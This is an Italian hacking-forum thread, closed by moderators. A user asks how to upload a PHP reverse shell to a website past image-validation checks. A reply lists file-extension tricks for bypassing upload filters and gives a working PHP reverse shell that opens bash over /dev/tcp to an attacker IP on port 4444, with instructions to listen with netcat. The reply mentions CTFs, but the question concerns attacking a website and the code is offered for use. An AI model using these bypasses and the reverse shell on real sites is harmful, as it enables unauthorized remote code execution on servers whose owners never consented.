Domanda Php shell upload

Stato
Discussione chiusa ad ulteriori risposte.

Helplease

Utente Silver
29 Dicembre 2019
115
31
6
77
Buonasera a tutti, è da un po' di tempo che mi sono interessato all'attacco ad un sito web con l'upload di una reverse shell in php. So che per "convincere" il sito che il file caricato sia una foto esistono alcune tecniche, tra cui rinominarlo in .jpeg.php e .php.jpeg. Però ho letto di alcuni siti che verificano l'immagine provando a visualizzarla (non so se mi spiego). Qualcuno sa se esiste un modo per bypassare questo tipo di controllo? Grazie
 
Ultima modifica da un moderatore:
Si può fare, io nelle ctf cambiavo l'estensione del file per bypassare il controllo, puoi provare a cambiare l'estensione del file a:
.php3
.php4
.php5
.phtml
.php.jpg
E poi nel file .php inserisci il seguente codice:
PHP:
<?php
exec("bash -i >& /dev/tcp/ATTACKING-IP/4444 0>&1");
?>
Al posto di ATTACKING-IP inserisci il tuo IP e mettiti in ascolto sulla porta 4444 con netcat.
Segui questo corso sul web hacking che ti insegnerà molte cose utili, segui anche questa guida sul bypass del file upload.

La File Upload non è l'unico modo per fare RCE
 
Stato
Discussione chiusa ad ulteriori risposte.